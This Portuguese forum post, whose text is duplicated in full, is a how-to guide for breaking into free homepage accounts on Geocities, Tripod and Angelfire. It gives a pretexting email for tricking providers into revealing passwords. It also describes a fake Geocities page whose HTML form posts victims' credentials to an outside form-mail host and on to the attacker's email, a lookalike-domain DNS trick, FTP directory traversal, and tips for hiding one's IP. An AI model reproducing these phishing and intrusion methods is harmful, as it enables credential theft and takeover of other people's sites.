Tweet
Nesse texto vou mostrar alguns métodos de como hackear uma home page. Queria avisar que hackear uma home page é considerado crime e que isso dá cadeia. Toda vez que você entra em um sistema seu IP fica gravado e vão poder te encontrar . Portanto antes de cometer um ato como esse eu sugiro que vocês tomem umas medidas de segurança como spoofing e etc... um ataque via browser pode ser usado o proprio ANONIMIZER. Muito cuidado!!!
ATAQUE VIA -BROWSER
O ataque via browser é com certeza o modo mais simples de se obter o arquivo passwd. É tão simples que você não precisa saber nada!
A única coisa que você tem que fazer é abrir seu browser e colocar uma URL.
Porém esse método tem 80% de chance de não funcionar! Mas não custa nada tentar
A maioria dos servidores já acharam o bug e concertaram.
Só colocar essa URL no location do seu browser :
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas isso e pronto!
HACKEANDO SERVIDORES DE HOME PAGES GRATIS (1)
Alguns servidores de home page tipo a geocities, tripod e a angelfire, dão espaço para pessoas colocarem suas home pages no ar. Há um modo bem simples de se obter a senha de home pages que estão nesses servidores.
Tudo que voce tem que fazer é mandar um e-mail pedindo
pra eles te mandarem a senha da home page.
Mas não mande um e-mail estúpido tipo : "por favor me mandem a senha".
Façam algo mais convincente e de preferencia em inglês. Pegue todas as informações da HP possíveis.
E faça do tipo :
"Mês passado eu me cadastrei no serviço de vocês e recebi uma senha e um user name e meu endereço . Eu coloquei algumas coisas no meu espaço e saí de férias. Quando voltei das ferias eu tinha me esquecido da senha!! Só me lembrava do user name, que é : "user name da HP". Fiquei um bom tempo de ferias e não pude pagar o provedor, por isso estou com um e-mail diferente do que consta no cadastro de vocês. O meu antigo e-mail era esse "mail do webmaster da HP" Por favor preciso que vocês me mandem um e-mail para "seu e-mail". Porque eu não tenho o backup dos arquivos que coloquei lá e não gostaria de perde-los. Obrigado pela atenção. Espero que voces mandem a senha o mais rápido que puderem."
Companhias como a geocities são muito ocupadas pra ficar verificando se é verdade eu não!
Provavelmente eles irao acreditar e em 2 semanas(mais ou menos) você receberá a senha no seu e-mail... crie uma conta de e-mail anonimo com nome@hotmail.com
HACKEANDO SERVIDORES DE HOME PAGES GRATIS (2)
Outro modo de hackear esse tipo de home pages é enganar o próprio webmaster da HP! Esse modo funciona normalmente com webmasters idiotas que não sabem muito coisa e nem percebem que eles mesmos estão dando a senha para o hackeador. É outro método bem simples mas um pouco mais demorado. O que você tem que fazer é criar uma pagina onde você finge que é a geocities que esta dando mais megas para HP's! Ou seja, você terá que criar uma página imitando a geocities! Faça uma pagina exatamente no estilo da da geo. E coloque tudo com as mesmas gifs, mesmos banners e coloque um formulário pra ser preenchido e diga que quem preencher aquilo vai ganhas mais 10 megas livre de espaço pra HP!!!
Nesse formulário o cara terá que colocar o user e a senha da HP, o endereço e etc.... Para o cara "receber" os megas ele terá que enviar o formulário. Para isso ela deverá clicar em algum botão de envio, normalmente um botão que fica escrito "submit" Quando a pessoa clica no botão submit formulário é enviado para a geocities pois aquele botão tem um comando para enviar para a geocities.Então o que você terá que fazer é mudar o comando. Em vez do formulário ser enviado para a geocities esse formulário vai ser enviado para o seu e-mail. Para isso você terá que editar a pagina da geocities. No lugar que t em escrito:
<form action="/cgi-bin/homestead/file_manager"method=post></td>
Você tará que trocar para :
<FORM ACTION="http://www.uky.edu/cgi-bin/cgiwrap/~johnr/Any
Form.cgi"METHOD="Post">
<INPUT TYPE="Hidden" Name="AnyFormMode"Value="mail">
<INPUT TYPE="Hidden"Name="AnyFormDisplay"Value="http://www.geocities.
com/members/tools/file_manager.html">
<INPUT TYPE="Hidden" Name="AnyFormTo"Value="Coloque seu e-mail aqui">
<INPUT TYPE="Hidden" Name="AnyFormSubject"Value="Senha hackeada da geocities">
Então assim que o cara clicar no botão submit todos os dados seram enviados para o seu e-mail.
E assim você terá a senha.
Agora é só pegar um endereço na net e colocar essa pagina editada na geocities nele e mandar as pessoas visitarem.
E pronto! O formulário vai chegar com a senha e user name no teu e-mail.
Há uma tecnica parecida com essa mas é MUITO mais complicada.
Pra isso você vai precisar de um servidor pessoal e terá que mudar algumas configurações em TCP/IP Pra isso abra o painel de controle e entre no ícone redes.
Agora entre nas propriedades de TCP/IP.
Entre na conficuração DNS.
Selecione ativar DNS.
Agora escreva no HOST-->Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... que geocities está escrito com "l" e não um "i")
Então escreva no dominio-->COM.
Agora dê OK em tudo. Vai pedir que você reinicie o micro.
Pode reiniciar.
Siga o mesmo procedimento do formulário e da pagina da geocities da explicação anterior.
Salva essa pagina e coloque-a no diretório de paginas do seu servidor.
Então voce cria um diretório chamado "members", entra nesse diretório e crie um, diretório chamado "tools". Coloque tudo da page editada nesse diretório.
Coloque seu servidor pra funcionar e mande o cara entrar em :
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
O endereço tem que ser esse. Se a pessoa entrar no file manager da geocities isso não vai funcionar(ooohhh!!!)
Quando o cara colocar os dados dele lá e enviar estará tudo no teu mail!
Queria avisar que esses metodos também funcionam com a angelfire e com a tripod.
A geocities foi usada como exemplo.
HACKEANDO UMA HP EM QUE VOCE JÁ TENHA CADASTRO
Esse método é realmente difícil de funcionar mas as vezes funciona com uns admins bem idiotas.
Quando você entra no seu ftp você pode sair do seu diretório home (diretorio onde você esta assim que entra) e voltar alguns diretórios até encontrar o diretório da HP que você quer hackear. Uma vez que voce já fez, se você puder ter acesso aos arquivos HTML pegue-os e edite eles! E pronto!
Com admins mais inteligentes você não consegue ter acesso os arquivos da page alvo.
ATAQUE VIA -BROWSER
O ataque via browser é com certeza o modo mais simples de se obter o arquivo passwd. É tão simples que você não precisa saber nada!
A única coisa que você tem que fazer é abrir seu browser e colocar uma URL.
Porém esse método tem 80% de chance de não funcionar! Mas não custa nada tentar
A maioria dos servidores já acharam o bug e concertaram.
Só colocar essa URL no location do seu browser :
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas isso e pronto!
HACKEANDO SERVIDORES DE HOME PAGES GRATIS (1)
Alguns servidores de home page tipo a geocities, tripod e a angelfire, dão espaço para pessoas colocarem suas home pages no ar. Há um modo bem simples de se obter a senha de home pages que estão nesses servidores.
Tudo que voce tem que fazer é mandar um e-mail pedindo
pra eles te mandarem a senha da home page.
Mas não mande um e-mail estúpido tipo : "por favor me mandem a senha".
Façam algo mais convincente e de preferencia em inglês. Pegue todas as informações da HP possíveis.
E faça do tipo :
"Mês passado eu me cadastrei no serviço de vocês e recebi uma senha e um user name e meu endereço . Eu coloquei algumas coisas no meu espaço e saí de férias. Quando voltei das ferias eu tinha me esquecido da senha!! Só me lembrava do user name, que é : "user name da HP". Fiquei um bom tempo de ferias e não pude pagar o provedor, por isso estou com um e-mail diferente do que consta no cadastro de vocês. O meu antigo e-mail era esse "mail do webmaster da HP" Por favor preciso que vocês me mandem um e-mail para "seu e-mail". Porque eu não tenho o backup dos arquivos que coloquei lá e não gostaria de perde-los. Obrigado pela atenção. Espero que voces mandem a senha o mais rápido que puderem."
Companhias como a geocities são muito ocupadas pra ficar verificando se é verdade eu não!
Provavelmente eles irao acreditar e em 2 semanas(mais ou menos) você receberá a senha no seu e-mail... crie uma conta de e-mail anonimo com nome@hotmail.com
HACKEANDO SERVIDORES DE HOME PAGES GRATIS (2)
Outro modo de hackear esse tipo de home pages é enganar o próprio webmaster da HP! Esse modo funciona normalmente com webmasters idiotas que não sabem muito coisa e nem percebem que eles mesmos estão dando a senha para o hackeador. É outro método bem simples mas um pouco mais demorado. O que você tem que fazer é criar uma pagina onde você finge que é a geocities que esta dando mais megas para HP's! Ou seja, você terá que criar uma página imitando a geocities! Faça uma pagina exatamente no estilo da da geo. E coloque tudo com as mesmas gifs, mesmos banners e coloque um formulário pra ser preenchido e diga que quem preencher aquilo vai ganhas mais 10 megas livre de espaço pra HP!!!
Nesse formulário o cara terá que colocar o user e a senha da HP, o endereço e etc.... Para o cara "receber" os megas ele terá que enviar o formulário. Para isso ela deverá clicar em algum botão de envio, normalmente um botão que fica escrito "submit" Quando a pessoa clica no botão submit formulário é enviado para a geocities pois aquele botão tem um comando para enviar para a geocities.Então o que você terá que fazer é mudar o comando. Em vez do formulário ser enviado para a geocities esse formulário vai ser enviado para o seu e-mail. Para isso você terá que editar a pagina da geocities. No lugar que t em escrito:
<form action="/cgi-bin/homestead/file_manager"method=post></td>
Você tará que trocar para :
<FORM ACTION="http://www.uky.edu/cgi-bin/cgiwrap/~johnr/Any
Form.cgi"METHOD="Post">
<INPUT TYPE="Hidden" Name="AnyFormMode"Value="mail">
<INPUT TYPE="Hidden"Name="AnyFormDisplay"Value="http://www.geocities.
com/members/tools/file_manager.html">
<INPUT TYPE="Hidden" Name="AnyFormTo"Value="Coloque seu e-mail aqui">
<INPUT TYPE="Hidden" Name="AnyFormSubject"Value="Senha hackeada da geocities">
Então assim que o cara clicar no botão submit todos os dados seram enviados para o seu e-mail.
E assim você terá a senha.
Agora é só pegar um endereço na net e colocar essa pagina editada na geocities nele e mandar as pessoas visitarem.
E pronto! O formulário vai chegar com a senha e user name no teu e-mail.
Há uma tecnica parecida com essa mas é MUITO mais complicada.
Pra isso você vai precisar de um servidor pessoal e terá que mudar algumas configurações em TCP/IP Pra isso abra o painel de controle e entre no ícone redes.
Agora entre nas propriedades de TCP/IP.
Entre na conficuração DNS.
Selecione ativar DNS.
Agora escreva no HOST-->Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... que geocities está escrito com "l" e não um "i")
Então escreva no dominio-->COM.
Agora dê OK em tudo. Vai pedir que você reinicie o micro.
Pode reiniciar.
Siga o mesmo procedimento do formulário e da pagina da geocities da explicação anterior.
Salva essa pagina e coloque-a no diretório de paginas do seu servidor.
Então voce cria um diretório chamado "members", entra nesse diretório e crie um, diretório chamado "tools". Coloque tudo da page editada nesse diretório.
Coloque seu servidor pra funcionar e mande o cara entrar em :
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
O endereço tem que ser esse. Se a pessoa entrar no file manager da geocities isso não vai funcionar(ooohhh!!!)
Quando o cara colocar os dados dele lá e enviar estará tudo no teu mail!
Queria avisar que esses metodos também funcionam com a angelfire e com a tripod.
A geocities foi usada como exemplo.
HACKEANDO UMA HP EM QUE VOCE JÁ TENHA CADASTRO
Esse método é realmente difícil de funcionar mas as vezes funciona com uns admins bem idiotas.
Quando você entra no seu ftp você pode sair do seu diretório home (diretorio onde você esta assim que entra) e voltar alguns diretórios até encontrar o diretório da HP que você quer hackear. Uma vez que voce já fez, se você puder ter acesso aos arquivos HTML pegue-os e edite eles! E pronto!
Com admins mais inteligentes você não consegue ter acesso os arquivos da page alvo.
Comment